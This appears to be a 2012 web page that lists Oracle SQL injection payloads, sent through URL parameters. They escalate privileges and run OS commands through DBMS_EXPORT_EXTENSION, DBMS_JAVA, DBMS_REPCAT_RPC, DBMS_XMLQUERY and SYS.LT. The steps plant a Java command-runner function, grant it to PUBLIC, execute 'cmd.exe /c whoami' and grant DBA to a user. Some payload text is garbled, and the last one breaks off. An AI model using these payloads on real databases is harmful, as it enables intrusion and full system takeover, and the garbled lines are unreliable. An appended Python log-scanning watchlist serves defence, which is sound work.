Date: 2012-04-21 09:25:00  Source: compiled by this site

Summary of Oracle blind-injection and error-based statements and Oracle privilege-escalation statements [Oracle defense]


  and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(‘FOO’,'BAR’,'DBMS_OUTPUT”.PUT(:P1);EXECUTE IMMEDIATE”DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ””begin dbms_java.grant_permission(”””PUBLIC””””, ””””SYS:java.io.FilePermission””””,””””<>””””, ””””execute””””);end;””;END;”;END;–’,'SYS’,0,’1′,0) from dual) is not null-

  Create$Functio

  http://ooo/1.jsp?1=String'’ and (select

  SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(‘FOO’,'BAR’,'DBMS_OUTPUT”

  .PUT(:P1);EXECUTE IMMEDIATE

  ”DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ””create

  or replace function LinxRunCMD(p_cmd in

  varchar2) return varchar2 as language java name

  ””””LinxUtil.runCMD(java.lang.String) return String””””;

  ””;END;”;END;–’,'SYS’,0,’1′,0) from dual) is not null-

  Grant$function$execute$Privilege

  http://ooo/1.jsp?1=String'’ and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(‘FOO’,'BAR’,'DBMS_OUTPUT”.PUT(:P1);EXECUTE IMMEDIATE ”DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ””grant all on LinxRunCMD to public””;END;”;END;–’,'SYS’,0,’1′,0) from dual) is not null –

  Execute$OS$Code

  http://ooo/1.jsp?1=String'’ and (select sys.LinxRunCMD(‘cmd.exe /c whoami’) from dual) is not null-

  Using Java permissions

  Affected systems: 10g R2, 11g R1 and 11g R2

  a) DBMS_JAVA.RUNJAV

  Affected systems: 11gR1, 11gR2

  http://ooo/1.jsp?1=String'’ and (SELECT DBMS_JAVA.RUNJAVA (‘oracle/aurora/util/Wrapper c:\\windows\\system32\\cmd.exe /c dir>C:\\OUT.LST’) FROM DUAL) is not null –

  b) DBMS_JAVA_TEST.FUNCAL

  Affected systems: 10g R2, 11g R1, 11g R2

  http://ooo/1.jsp?1=String'’ and (Select DBMS_JAVA_TEST.FUNCALL (‘oracle/aurora/util/Wrapper’,'main’,'c:\\windows\\system32\\cmd.exe’,'/c’,'dir>c:\\OUT2.LST’) FROM DUAL) is not null—

  DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC

  Affected systems: Oracle 8, 9, 10g R1, 10g R2, 11g R1


  1. Create Library

  http://ooo/1.jsp?1=String'’ and (select SYS.DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC(USER,’VALIDATE_GRP_OBJECTS_LOCAL(:canon_gname);EXECUTE IMMEDIATE ”DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ””create or replace and compile java source named “LinxUtil” as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str=”";while ((stemp = myReader.readLine()) != null) str+=stemp+”\n”;myReader.close();return str;} catch (Exception e){returne.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str=”";while ((stemp = myReader.readLine()) != null) str +=stemp+”\n”;myReader.close();return str;} catch (Exception e){return e.toString();}}}””;END;”;END;–‘,’CCCCC’) from dual) is not null-

  2. Granting JAVA permissions

  http://www.110hack.com /1.jsp?1=String'’ and (select SYS.DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC(USER,’VALIDATE_GRP_OBJECTS_LOCAL(:canon_gname);EXECUTE IMMEDIATE ”DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ””create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ””””LinxUtil.runCMD(java.lang.String) return String””””;””;END;”;END;–’,'CCCCC’) from dual) is not null –

  3. Making function executable by PUBLIC

  http://ooo/1.jsp?1=String'’ and (select SYS.DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC(USER,’VALIDATE_GRP_OBJECTS_LOCAL(:canon_gname);EXECUTE IMMEDIATE ”DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGINEXECUTE IMMEDIATE ””grant all on LinxRunCMD to public””;END;”;END;–‘,’CCCCC’) from dual) is not null –

  4. Executing OS Code

  http://ooo/1.jsp?1=String'’ and (select sys.LinxRunCMD(‘cmd.exe /c whoami ‘) from dual) is not null –

  After patching: requires the CREATE PROCEDURE privilege

  1.Create Function

  http://www.110hack.com /default.jsp?1=intenger and (select dbms_xmlquery.newcontext(‘declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate ”create or replace function pwn2 return varchar2 authid current_user is PRAGMA autonomous_transaction;BEGIN execute immediate ””grant dba to scott””;commit;return ””z””;END; ”; commit; end;’) from dual) is not null –

  2. Exploiting SYS.L

  http://ooo/default.jsp?1=intenger and (select dbms_xmlquery.newcontext(‘declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate ” begin SYS.LT.CREATEWORKSPACE(””A10”””” and scott.pwn2()=””””x””); YS.LT.REMOVEWORKSPACE(””A10”””” and scott.pwn2()=””””x””);end;”; commit; end;’) from dual) is not null –

  Let’s look at CPU of October 2010 (vulnerable versions 10gR1, 10gR2, 11g R1 and 11gR2) and look at the vulnerability in package sys.dbms_cdc_publish.create_change_set which allows a user with EXECUTE_CATALOG_ROLE privilege to become DBA.

  http://ooo/default.jsp?1=intenger and (select dbms_xmlquery.newcontext(‘declare PRAGMAAUTONOMOUS_TRANSACTION
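  Added example, not part of the original article: a check a defender can run over web access logs to flag requests whose parameters name the Oracle packages and keywords used in the statements above. The log lines are constructed samples, and the watchlist selection and the function names (`normalise`, `scan_line`, `scan_log`) are assumptions of this example.

```python
import re
from urllib.parse import unquote_plus

# Package, routine and keyword names that appear in the statements on this page.
WATCHLIST = [
    "DBMS_EXPORT_EXTENSION", "DBMS_JAVA.GRANT_PERMISSION", "DBMS_JAVA.RUNJAVA",
    "DBMS_JAVA_TEST.FUNCALL", "DBMS_REPCAT_RPC", "DBMS_XMLQUERY.NEWCONTEXT",
    "LT.CREATEWORKSPACE", "DBMS_CDC_PUBLISH",
    "AUTONOMOUS_TRANSACTION", "EXECUTE IMMEDIATE",
]

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /1.jsp?1=42 HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /1.jsp?1=x%27%20and%20(select%20sys.dbms_export_extension.get_domain_index_tables(%27a%27)%20from%20dual)%20is%20not%20null HTTP/1.1" 500 0',
    '203.0.113.9 - - [01/Jan/2024:10:02:11 +0000] "GET /default.jsp?1=1%2520and%2520(select%2520DBMS_XmlQuery.NewContext(%2527declare%2520pragma%2520autonomous_transaction;%2527)%2520from%2520dual) HTTP/1.1" 200 0',
]

def normalise(raw):
    """Undo up to three URL-encoding layers, blank SQL comments, fold spacing and case."""
    text = raw
    for _ in range(3):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)  # inline comments act as spaces
    text = re.sub(r"\s+", " ", text)
    text = re.sub(r"\s*\.\s*", ".", text)               # "SYS . LT" -> "SYS.LT"
    return text.upper()

def scan_line(line):
    """Return the sorted watchlist entries found in one log line's request target."""
    m = re.search(r'"(?:GET|POST|HEAD) (\S+)', line)
    if not m:
        return []
    text = normalise(m.group(1))
    return sorted(w for w in WATCHLIST if w in text)

def scan_log(lines):
    """Return (line number, client address, indicators) for every flagged line."""
    findings = []
    for no, line in enumerate(lines, 1):
        hits = scan_line(line)
        if hits:
            findings.append((no, line.split(" ", 1)[0], hits))
    return findings

if __name__ == "__main__":
    print(*scan_log(SAMPLE_LOG), sep="\n")
```

  This only sees the request line, so parameters sent in POST bodies need the same check applied at the application or WAF layer.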

